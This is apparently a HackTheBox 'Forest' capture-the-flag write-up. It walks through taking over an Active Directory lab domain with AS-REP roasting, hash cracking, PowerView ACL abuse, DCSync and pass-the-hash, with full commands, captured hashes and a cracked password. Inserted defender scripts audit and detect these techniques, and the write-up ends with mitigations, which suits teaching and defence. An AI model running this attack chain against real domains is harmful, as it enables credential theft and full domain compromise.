Forest HTB Writeup

Machine: Forest
Platform: HackTheBox
Difficulty: Medium
OS: Windows

Reconnaissance

Initial Scan

First, I set the target IP and performed a full port scan:

export target=10.129.19.180
sudo nmap -p- --min-rate 1000 -sT -vvv $target

Discovered Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 9389, 47001, 49664, 49665, 49666, 49668, 49671, 49676, 49677, 49681, 49698, 50016

Service Enumeration

sudo nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49676,49677,49681,49698,50016 -T4 $target

Key Findings:

DNS Enumeration

Attempted zone transfers but they were blocked:

dig axfr @10.129.19.180 htb.local
dig axfr @10.129.19.180 forest.htb

SMB Enumeration

Anonymous login was successful but no shares were accessible:

smbclient -N -L //10.129.19.180/

LDAP Enumeration

ldapsearch -x -H ldap://10.129.19.180 -s base namingcontexts

Discovered base DN: DC=htb,DC=local

RPC Client Enumeration

This revealed the most valuable information - domain users and groups:

rpcclient -U "" -N 10.129.19.180

# Enumerate users
rpcclient $> enumdomusers

Discovered Users: Administrator, Guest, krbtgt, svc-alfresco, sebastien, lucinda, andy, mark, santi

Discovered Groups:

Initial Foothold

AS-REP Roasting Attack

Since several domain users had been discovered, I attempted AS-REP Roasting:

# Create users list from rpcclient output
echo "Administrator" > users
echo "Guest" >> users
echo "krbtgt" >> users
echo "svc-alfresco" >> users
echo "sebastien" >> users
echo "lucinda" >> users
echo "andy" >> users
echo "mark" >> users
echo "santi" >> users

# Perform AS-REP Roasting: one request per user; stderr of GetNPUsers is
# silenced and the Impacket banner lines are filtered out of stdout
while read -r i; do
    impacket-GetNPUsers -no-pass -dc-ip 10.129.19.180 "HTB.LOCAL/${i}" 2>/dev/null | grep -v Impacket
done < users

Success! User svc-alfresco had Kerberos pre-authentication disabled and returned a crackable AS-REP hash:

$krb5asrep$23$svc-alfresco@HTB.LOCAL:9cd60576bdc3ac0490a0dd377dbd9977$184fe48cb91e43c670daa1f582ff3848abeff3234fd40845fdec837c759e68f46bce3d2416001d13e1b6e4c0fb41cc27cb63e5610a8b0bb1b89fce6d36a233f44e11484958038feb13f7ee301b0e5d723b4b78fb89f53da369647a0691207f884ebc24c8294e4f2c6e6a5ba5c2fa8ab1c4cdc9f9e21a1fd41210d18320964c31a5eba59a1cf418317195401dfe5cfd7eb2d6a273430599fb76c52dda260b75f96af2d8bf1381765c56c0ef801e158b47d318536227747bb3ceddb83378fa6f4d146336f6f1bbdcc93be6c26bc85c7d0a539cb29813bd9a1584cf32befe1230d196dc023e75be
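As a defender-side counterpart to the roasting step above (an added example, not part of the original writeup): this Python parses ldapsearch-style output for userAccountControl and lists enabled accounts with DONT_REQ_PREAUTH set, which is exactly the condition that let svc-alfresco's AS-REP be requested. The LDIF sample and the olddev account are constructed; the flag values are the documented userAccountControl bits.

```python
# Documented userAccountControl bits (subset); DONT_REQ_PREAUTH (0x400000) is
# the one AS-REP roasting depends on.
UAC_FLAGS = {0x0002: "ACCOUNTDISABLE", 0x0200: "NORMAL_ACCOUNT",
             0x10000: "DONT_EXPIRE_PASSWORD", 0x400000: "DONT_REQ_PREAUTH"}

def decode_uac(value):
    """Names of the userAccountControl bits set in value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]

def parse_ldif(text):
    """Minimal LDIF reader: one dict per blank-line-separated entry."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, val = line.partition(":")
        current[key.strip().lower()] = val.strip()
    if current:
        entries.append(current)
    return entries

def asrep_roastable(entries):
    """Enabled accounts that do not require Kerberos pre-authentication."""
    hits = []
    for e in entries:
        flags = decode_uac(int(e.get("useraccountcontrol", "0")))
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            hits.append(e["samaccountname"])
    return hits

# Constructed sample in the shape of an ldapsearch query for
# sAMAccountName and userAccountControl under DC=htb,DC=local.
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=sebastien,CN=Users,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=olddev,CN=Users,DC=htb,DC=local
sAMAccountName: olddev
userAccountControl: 4260354
"""
```

The disabled olddev account is reported as clean on purpose: a disabled account cannot obtain an AS-REP, so only enabled accounts with the flag matter.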

Password Cracking

Saved the hash to a file and cracked it with hashcat:

echo '$krb5asrep$23$svc-alfresco@HTB.LOCAL:...' > hash
hashcat -m 18200 -a 0 hash /usr/share/wordlists/rockyou.txt

Cracked Password: s3rvice

Initial Access

With valid credentials, I accessed the system via WinRM:

evil-winrm -i 10.129.19.180 -u svc-alfresco -p 's3rvice'

User Flag: 101f7af620a48d0d9d74784d7836cccf

Privilege Escalation

BloodHound Setup

To understand the Active Directory environment better, I set up BloodHound:

# Install BloodHound
sudo apt update && sudo apt install -y docker.io docker-compose
mkdir -p ~/bloodhound && cd ~/bloodhound
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install

# Start BloodHound
./bloodhound-cli start

Data Collection

I needed to collect AD data using SharpHound:

# On attacker machine - start SMB server
impacket-smbserver share . -smb2support -username ara -password ara

# On victim machine via Evil-WinRM
net use \\10.10.14.142\share /u:ara ara
copy \\10.10.14.142\share\SharpHound.exe
.\SharpHound.exe

# After collection, transfer back to attacker
copy 20251105051325_BloodHound.zip \\10.10.14.142\share\blood.zip

BloodHound Analysis

The analysis revealed a critical attack path:

  1. svc-alfresco is a member of Service Accounts
  2. Service Accounts is a member of Privileged IT Accounts
  3. Privileged IT Accounts has WriteDACL on the Domain Admins group

This means we can modify the Domain Admins group permissions!

ACL Abuse Attack

Using PowerView, I exploited the WriteDACL permission:

# Load PowerView (uploaded via SMB)
. .\PowerView.ps1

# Create credential object
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $SecPassword)

# Step 1: Grant svc-alfresco the WriteMembers right on the Domain Admins group
# (Add-DomainObjectAcl needs both the target object and the principal receiving the right)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity svc-alfresco -Rights WriteMembers

# Step 2: Add ourselves to Domain Admins group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'svc-alfresco' -Credential $Cred

# Verify we're now in Domain Admins
Get-DomainGroupMember -Identity 'Domain Admins'
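An added audit script (not from the original writeup) for the WriteDACL finding above: it reads an ACE export of the Domain Admins group in the column layout produced by (Get-Acl 'AD:\<dn>').Access | Export-Csv and reports any principal outside an expected set that holds GenericAll, WriteDacl, WriteOwner, or WriteProperty on the member attribute. The CSV rows, the Helpdesk principal and the EXPECTED set are constructed assumptions.

```python
import csv
import io

# Schema GUID of the "member" attribute: WriteProperty scoped to it is the
# "WriteMembers" right the walkthrough above grants itself.
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"
ALL_PROPERTIES = "00000000-0000-0000-0000-000000000000"
# Rights that let the holder take over the group outright.
TAKEOVER_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner"}
# Principals expected to control Domain Admins (assumed set; adjust per forest).
EXPECTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
            "HTB\\Domain Admins", "HTB\\Enterprise Admins"}

def parse_aces(csv_text):
    """Read ACEs exported with (Get-Acl 'AD:\\<group dn>').Access | Export-Csv."""
    return list(csv.DictReader(io.StringIO(csv_text)))

def risky_aces(aces, expected=EXPECTED):
    """Allow ACEs giving takeover or member-write rights to unexpected principals."""
    findings = []
    for ace in aces:
        if ace["AccessControlType"] != "Allow" or ace["IdentityReference"] in expected:
            continue
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        reasons = sorted(rights & TAKEOVER_RIGHTS)
        if "WriteProperty" in rights and ace["ObjectType"].lower() in (MEMBER_ATTR_GUID, ALL_PROPERTIES):
            reasons.append("WriteMembers")
        if reasons:
            findings.append((ace["IdentityReference"], reasons))
    return findings

# Constructed export for CN=Domain Admins,CN=Users,DC=htb,DC=local; the
# Privileged IT Accounts row mirrors the BloodHound finding above, Helpdesk is invented.
SAMPLE_CSV = """\
IdentityReference,ActiveDirectoryRights,ObjectType,AccessControlType,IsInherited
NT AUTHORITY\\SYSTEM,GenericAll,00000000-0000-0000-0000-000000000000,Allow,False
HTB\\Domain Admins,GenericAll,00000000-0000-0000-0000-000000000000,Allow,False
HTB\\Privileged IT Accounts,"ReadProperty, WriteDacl",00000000-0000-0000-0000-000000000000,Allow,False
HTB\\Helpdesk,WriteProperty,bf9679c0-0de6-11d0-a285-00aa003049e2,Allow,False
Everyone,ReadProperty,00000000-0000-0000-0000-000000000000,Allow,False
"""

if __name__ == "__main__":
    for who, why in risky_aces(parse_aces(SAMPLE_CSV)):
        print(f"[!] {who}: {', '.join(why)}")
```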

Domain Compromise via DCSync

With Domain Admin privileges, I performed DCSync to extract all password hashes:

impacket-secretsdump svc-alfresco:s3rvice@10.129.19.180

Administrator Hash Extracted:

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Root Access

Finally, I used Pass-the-Hash to gain Administrator access:

evil-winrm -i 10.129.19.180 -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'

Root Flag: 3d82964c9f5150ec7c13ac4ec2115ea8

Attack Summary

  1. Reconnaissance: Discovered domain users via RPC enumeration
  2. Initial Access: AS-REP Roasting on svc-alfresco → Password cracking → WinRM access
  3. Privilege Escalation: BloodHound analysis → ACL abuse → Added to Domain Admins
  4. Domain Compromise: DCSync → Extracted Administrator hash → Pass-the-Hash

Security Issues & Mitigations

Vulnerabilities Identified:

  1. AS-REP Roasting: User with pre-authentication disabled
  2. Weak Service Account Password: Easily crackable password
  3. Excessive Group Permissions: Privileged IT Accounts had unnecessary WriteDACL on Domain Admins

Mitigations:

  1. Enable Kerberos pre-authentication for all users
  2. Implement strong password policies for service accounts
  3. Apply principle of least privilege for group permissions
  4. Regularly audit ACLs and group memberships
  5. Monitor for DCSync attacks and unusual group modifications
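For the last mitigation, an added detection example (not part of the original writeup) in Python over constructed Security-log records: it flags Event 4662 entries carrying the DS-Replication-Get-Changes rights from any account other than a domain controller, which is what the DCSync step above generates, and member additions (4728/4732/4756) to high-privilege groups. The DC account name FOREST$ and the sample events are assumptions.

```python
# Control-access GUIDs that show up in Event 4662 "Properties" when a principal
# replicates directory changes, which is what DCSync requests.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
# 4728/4732/4756: member added to a security-enabled global/local/universal group.
GROUP_ADD_EVENTS = {4728, 4732, 4756}
WATCHED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Schema Admins"}

def is_dcsync(event, dc_accounts):
    """4662 with replication rights from anything but a DC computer account."""
    if event["EventID"] != 4662 or event.get("AccessMask") != "0x100":
        return False
    props = event.get("Properties", "").lower()
    if DS_REPL_GET_CHANGES not in props and DS_REPL_GET_CHANGES_ALL not in props:
        return False
    return event["SubjectUserName"].upper() not in {a.upper() for a in dc_accounts}

def is_privileged_group_add(event):
    """Member added to one of the groups that grant domain-wide control."""
    return event["EventID"] in GROUP_ADD_EVENTS and event.get("TargetUserName") in WATCHED_GROUPS

def triage(events, dc_accounts):
    """Return (alert type, detail) tuples in log order."""
    alerts = []
    for ev in events:
        if is_dcsync(ev, dc_accounts):
            alerts.append(("DCSYNC", ev["SubjectUserName"]))
        elif is_privileged_group_add(ev):
            alerts.append(("PRIV_GROUP_ADD",
                           f'{ev["MemberName"]} -> {ev["TargetUserName"]} by {ev["SubjectUserName"]}'))
    return alerts

# Constructed Security-log records, already split into fields as a SIEM would.
SAMPLE_EVENTS = [
    # the DC itself replicating: expected, must not alert
    {"EventID": 4662, "SubjectUserName": "FOREST$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4728, "SubjectUserName": "svc-alfresco", "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # a 4662 on an unrelated attribute: no replication right, no alert
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x100",
     "Properties": "{bf9679c0-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_EVENTS, {"FOREST$"}):
        print(f"[{kind}] {detail}")
```

Auditing of 4662 must be enabled for the relevant directory objects (via a SACL on the domain head) before these events are written at all.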

Tools Used

nmap, dig, smbclient, ldapsearch, rpcclient, Impacket (GetNPUsers, smbserver, secretsdump), hashcat, Evil-WinRM, BloodHound with SharpHound, PowerView

This comprehensive approach demonstrates the importance of proper Active Directory configuration and the dangers of excessive permissions in enterprise environments.